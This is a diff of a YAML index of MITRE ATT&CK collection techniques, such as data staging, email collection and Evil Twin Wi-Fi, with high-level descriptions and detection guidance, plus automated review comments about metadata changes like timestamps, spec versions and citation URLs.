- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests: []
T1114.001:
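Review bot: besides the key reordering, the real edits in this hunk are the Prevailion DarkWatchman reference URL switching from the live site (L20346) to a web.archive.org snapshot (L20398) and `x_mitre_attack_spec_version` going from 2.1.0 (L20385) to 3.2.0 (L20401). Both look like faithful upstream changes; a one-line note in the PR description that citation URLs were replaced with archived copies would save the next reader from checking each one.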
@@ -40809,7 +41292,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -40833,13 +41316,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -40860,6 +41341,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -40883,8 +41365,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -40909,7 +41393,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -40976,12 +41459,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests: []
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -41015,10 +41497,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -41029,13 +41513,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -41076,37 +41561,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -41117,23 +41576,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
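Review bot: the Mandiant M-Trends 2020 reference URL changes from content.fireeye.com (L20535) to a PDF on mandiant.com (L20581), and T1005's `modified` then steps backwards from 2023-05-09 to 2023-04-12 (L20589-L20590). The URL change is fine; the timestamp regression is the same pattern flagged on the earlier hunks and should be covered by the same answer about the source bundle.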
@@ -41203,7 +41686,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
@@ -41238,7 +41720,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -41257,10 +41739,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
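Review bot: the new T1557.004 (Evil Twin) block lands with `x_mitre_detection: ''` and `atomic_tests: []` and, unlike the neighbouring T1560.002 entry (`identifier: T1560.002`), carries no `identifier:` key; if the index generator or any downstream consumer reads `identifier`, it must tolerate its absence, or the generator should emit the key for new entries as well. Also worth checking in this hunk: the `- x_mitre_attack_spec_version: 2.1.0` removed from T1560.002 at the top has no visible `+ x_mitre_attack_spec_version: 3.2.0` counterpart, whereas the other entries refreshed in this patch end up on 3.2.0.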
@@ -41289,7 +41850,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
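Review bot: the `modified` timestamp for Network Device Configuration Dump moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-02-17T19:50:46.948Z`. The same regression recurs through the patch (Browser Session Hijacking, LLMNR/NBT-NS Poisoning, Video Capture, ARP Cache Poisoning), and every old value shares the `T14:00:00.188Z` suffix, so the previous dates look like a bulk stamp rather than real upstream edits. Acceptable, but the commit message should state that the timestamps now mirror the upstream STIX values so the rollback is not mistaken for data loss.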
@@ -41319,8 +41880,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
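Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are dropped from Network Device Configuration Dump with no replacement `x_mitre_attack_spec_version` visible in this hunk, while other entries touched by the patch (DHCP Spoofing, Code Repositories) are bumped to 3.2.0. Confirm the key survives earlier in this object; otherwise the entry is left with no spec marker at all. Removing the STIX-level `spec_version` itself is done uniformly across the file and looks intentional.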
@@ -41374,7 +41933,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -41411,7 +41969,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -41439,12 +41997,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -41481,23 +42037,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
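Review bot: this hunk is pure key reordering for DHCP Spoofing (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_domains` and `x_mitre_is_subtechnique` move above `x_mitre_platforms` with no value changes). If the generator serialised keys in a fixed order instead of preserving whatever order upstream emits, diffs like this one, and the full re-emission of the T1213.001 and T1074 blocks later in the patch, would shrink to the lines that actually change.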
@@ -41530,21 +42086,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
@@ -41652,12 +42207,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -41668,13 +42222,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -41688,6 +42242,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -41698,12 +42253,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -41748,30 +42303,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -41781,31 +42317,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
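Review bot: `x_mitre_permissions_required: [User]` is removed from Confluence (T1213.001) and not re-added in the rebuilt block; Input Capture (T1056) loses its `x_mitre_permissions_required` list the same way further down. That matches ATT&CK retiring the field in the 3.x spec, so the drop is expected, but it is a schema change for anything consuming this YAML and deserves a line in the changelog. The rest of the hunk is the T1213.001 block re-emitted in a new key order plus the description link to T1552 and the `1.0` to `1.1` version bump.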
@@ -41838,10 +42391,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -41850,16 +42405,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
